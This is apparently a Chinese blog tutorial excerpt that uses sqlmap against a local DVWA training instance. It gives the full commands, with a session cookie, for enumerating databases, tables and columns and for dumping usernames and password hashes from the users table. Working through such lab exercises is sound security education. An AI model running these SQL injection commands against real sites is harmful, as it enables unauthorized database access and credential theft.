SQL注入之SQLmap入门 (注入检测工具)

2019-10-02 23:45:58丽君

使用选项:

    –dbs: 枚举DBMS中的数据库

    结果如下:

    availabledatabases [5]:
    [*]dvwa
    [*]information_schema
    [*]mysql
    [*]performance_schema
    [*]phpmyadmin

    下面我们尝试枚举DVWA数据表,执行以下命令:

    “sqlmap.py-u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”

    使用选项:

    1、-D : 要枚举的DBMS数据库

    2、–tables     : 枚举DBMS数据库中的数据表

    得到结果如下:

    Database: dvwa
    [2 tables]
    +————+
    | guestbook |
    | users |
    +————+

    下面获取用户表的列,命令如下:

     “sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”

    使用选项:

      -T : 要枚举的DBMS数据库表

      –columns : 枚举DBMS数据库表中的所有列

      结果如下:

      Database: dvwa
      Table: users
      [6 columns]
      +————+————-+
      | Column | Type|
      +————+————-+
      | avatar |varchar(70) |
      | first_name |varchar(15) |
      | last_name |varchar(15) |
      | password |varchar(32) |
      | user |varchar(15) |
      | user_id |int(6) |
      +————+————-+

      如上所示,以上为我们感兴趣的列,表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令,将用户与密码表中的所有用户名与密码dump出来:

      “sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”								 
      			 
相关文章 大家在看